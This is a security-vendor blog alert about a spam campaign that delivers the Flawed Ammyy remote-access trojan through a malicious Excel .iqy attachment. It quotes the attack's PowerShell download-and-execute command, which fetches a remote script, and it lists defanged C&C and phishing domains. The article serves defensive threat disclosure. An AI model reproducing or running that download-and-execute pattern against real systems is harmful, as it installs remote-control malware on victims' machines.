Security Alert: New Spam Campaign Delivers Flawed Ammyy RAT to Infect Victims’ Computers

Share and earn Cybytes
Facebook Twitter Google+ LinkedIn Email

There’s no doubt that malware remains one of the most known and dangerous online threats users are facing on a daily basis. Malicious actors use it in various cyber attacks to steal personal information, gain full access to a computer system and do everything they want on the PC.

This is the case of Remote Administration Tools (RATs) which are used by cybercriminals to remotely take full control of users’ PCs using Windows and infect them with malware.

Security researchers recently observed and analyzed a new spam campaign in which a RAT dubbed as Flawed Ammy, was used as a payload.

The name comes from a legit software, the Ammyy Admin Remote Desktop Software version 3, used by more than 75 million home and business users. This RAT has previously been used in other targeted email attacks and spam campaigns.

How does Flawed Ammy RAT spread?

In the observed spam campaign, malicious actors can easily take full control of victims’ machines, if they click and open the document received via email.

Keep in mind that this attack uses an Excel Web Query File (.iqv) attachment, which is a type of file used to download data from the Internet and copying it directly into an Excel sheet.

The unwanted email comes with the following content (sanitized for your own protection):

Subject Line:

Attachment: -> img_005.iqy

If a victim opens the attached file and clicks it, the Flawed Ammyy RAT will be downloaded and malicious actors will be running it from this location http: // 24hourssupports [.] Com / img01 .gif  (sanitized for your safety)

The malicious file is actually a Powershell script that can perform the following command:

= Cmd | ‘ / c C: Windows System32 WindowsPowerShell v1.0 powershell.exe -nop -NoLogo -c IEX ((new-object net.webclient) .downloadstring ( “http: // 24hourssupports [.] com / img02 .gif “)) ‘! A0

As shown, this PowerShell script activates the download of another one (img02.gif) containing features that start a cmd.exe session and dropping the “cmd_.exe” file to the Windows temporary folder.

After that, the Flawed Ammyy RAT is configured so attackers can connect to the infected machine and communicate with the following C & C server located on this IP address: 169.239.128 [.] 149, and perform malicious activities.

Security researchers have also found that the same server has also been used for phishing attacks against iCloud and iTunes accounts:

appleid.itunes.kontolasumeme [.] com
appleid.icloud.asuppepekmemek [.] com

According to VirusTotal, only 3 antivirus products out of 60 have managed to detect this malicious .iqv file at the time we write this security alert. This means that it can bypass antivirus filters and another security solution is needed to enhance protection.

Heimdal Security proactively blocked these malicious domains, so all our Heimdal PRO and Heimdal CORP users are protected.

How to protect your computer from RATs

This type of malware can evade detection in the first place, so it’s essential to take all the security measures needed to keep your data safe.

  • Update your operating system, including all your apps and software programs, because it’s the first place where malicious actors can exploit vulnerabilities.
  • We keep reminding this: DO NOT open emails or click on files/attachments that look suspicious to you;
  •  Always have a backup with all your important data on external sources like a hard drive or in the cloud (Google Drive, Dropbox, etc.) to store it. Use this  guide to learn how to do it;
  • Make sure you have a reliable antivirus program installed on your computer to protect your valuable data from online threats;
  • Use multiple layers of protection and consider installing a proactive cyber security software solution;
  • Prevention is always recommended, so learning as much as possible about how to better detect spam campaigns is the right mindset. We recommend these free educational resources to gain more knowledge in the cybersecurity industry.

Stay safe and don’t click everything you get in your inbox!

Heimdal Official logo

If you liked this post, you will enjoy our newsletter.
Receive new articles directly in your inbox

* This article features cyber intelligence provided by CSIS Security Group researchers.

The post Security Alert: New Spam Campaign Delivers Flawed Ammyy RAT to Infect Victims’ Computers appeared first on Heimdal Security Blog.

Share this post and earn Cybytes
Facebook Twitter Google+ LinkedIn Email
About Heimdal Security
We protect users and companies from cyber-criminal actions, by keeping confidential information and intellectual property safe. We build products focused on proactive cyber security and we dedicate a big part of our efforts to cyber security education for everyone.
Promoted Content
Expert Roundup: Is Internet Security a Losing Battle?
A while ago, one of our readers asked us to answer the following questions: Is Internet security a losing battle? How come companies are always 1-2 steps behind the fight? How can the bad guys respond so fast?That reader is certainly not the only one with this issue on his mind. Many Internet users feel discouraged by the current state of cyber crime and its consequences, and the rest don’t yet understand why they should care about it. We wanted to do something to change this.Naturally, users like you and me are not the only ones who wrestle this dilemma. Within the industry, cyber security experts are deeply involved in studying the causes and changes which have brought us to this point so they can create better solutions. Each of these experts brings a different perspective to the discussion, because no single person can ever claim to have the full picture.That is why we reached out to some of the most experienced cyber security specialists in the field to gather their thoughts on the topic. We believe that the questions we received are justified and they deserve an honest answer. And you will find plenty of them in the article!

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play

Support Cybrary

Donate Here to Get This Month's Donor Badge

Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?